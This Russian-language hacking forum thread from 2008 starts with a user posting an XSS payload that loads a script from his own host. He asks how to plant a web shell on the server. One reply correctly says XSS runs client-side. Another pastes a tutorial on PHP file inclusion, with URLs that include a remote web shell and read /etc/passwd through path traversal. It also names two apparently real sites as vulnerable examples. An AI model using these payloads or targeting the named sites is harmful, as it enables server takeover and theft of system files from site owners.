загрузка файла с java..
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
загрузка файла с java.. - 2008-09-14 00:46:22.766666
|
|
|
ido46od
Сообщений: 71
Оценки: 0
Присоединился: 2008-07-17 21:31:29.910000
|
есть один сайт с хсс, вот и хсс: "><sсriрt src=http://******/xss.js></sсriрt><input type=text value=fuck-you. где http://******/ это мой сайт зареганной в phpnet.us. теперь нужно чтобы xss.js загрузил на сервер шелл или в xss.js написать сам шелл и при открытие создался на серваке шелл иди в xss.js сделать аплоад. такое возможно? если нет прошу скажите другие пути. заранее спасибо.
|
|
|
|
|
RE: загрузка файла с java.. - 2008-09-14 03:09:11.570000
|
|
|
b1аck$un
Сообщений: 55
Оценки: 0
Присоединился: 2008-08-26 05:55:35.736666
|
quote:
такое возможно?
Нет. XSS - это Client Side, тобишь скрипты, выполняемые на стороне клиента, а не на сервере.
|
|
|
|
|
RE: загрузка файла с java.. - 2008-09-14 20:55:59.160000
|
|
|
ido46od
Сообщений: 71
Оценки: 0
Присоединился: 2008-07-17 21:31:29.910000
|
я попробовал в js писать document.write('*******') (******* - <?php phpinfo(); ?>) не получился. а что можно делать чтобы выполнялся php код?
|
|
|
|
|
RE: загрузка файла с java.. - 2008-09-14 21:10:48.713333
|
|
|
b1аck$un
Сообщений: 55
Оценки: 0
Присоединился: 2008-08-26 05:55:35.736666
|
Эстонец? Я же сказал - никак ты шелл через ксс не зальешь! Пхп - работает на стороне сервера, JavaScript - на стороне клиента
|
|
|
|
|
RE: загрузка файла с java.. - 2008-09-15 20:24:18.693333
|
|
|
GivioN
Сообщений: 25
Оценки: 0
Присоединился: 2008-08-31 01:20:18.680000
|
quote:
ORIGINAL: ido46od
а что можно делать чтобы выполнялся php код?
PHP-injection
Для понимания ее устройства нам потребуется всего немного обратиться к языку PHP, конкретнее к функции include() в этом языке.
Давайте представим себе. что у нас имеется какой-то скрипт, который вызывается запросом вида:
site.com/file.php?page=index
А сам исходный код скрипта выглядит так:
..
Include ("$page.php");
…
Поясним, что это значит. Это всего-лишь означает, что данный скрипт будет загружать страницу, переданную в параметре page и присваивать ей расширение .php. Давайте для начала научимся проверять сайты на наличие php-injection. Попробуем просто набрать в адресной строке:
http://site.com/file.php?page=[hack]
В случае описанном выше мы получим ошибку вида:
Warning: main([hack].php): failed to open stream: No such file or directory in /home/user/www/file.php on line 3 Мы попытались подставить вместо указанного имени файла свое и у нас получилось. Система попыталась найти файл [hack].php - не смогла и выдала соответствующую ошибку.
Теперь давайте подставим вместо уязвимого параметра наш сайт с предварительно залитым на него web-shell'ом.
Например:
http://site.com/file.php?page=http://supersite/shell
В этом случае на удаленный сайт будет инклюднут файл shell.php, который находится на нашем сайте, что дальше делать - думаю понятно:-)
Теперь другой случай, имеем код вида:
..
Include ("sc<-b></b->ri<-b></b->pt/$page");
…
В данном случае - все что нам доступно - это чтение произвольных файлов на сервере, ибо вместо $page мы можем подставить:
../../../../../etc/passwd - например, что приведет к выводу /etc/passwd Но вот выполнить наш шелл находящийся на другом сервере мы уже не можем.
—
Вот основные моменты, которые приводят к php-injection'ам.
Для начала приведу пару примеров:
ВНЕШНИЙ ИНКЛЮД
http://www.sembiz.com/index.php?addr=[site] ЛОКАЛЬНЫЙ ИНКЛЮД
http://www.bilug.linux.it/php/out.htm?link=../../../../../../etc/passwd eraflame(с)
|
|
|
|
|
|
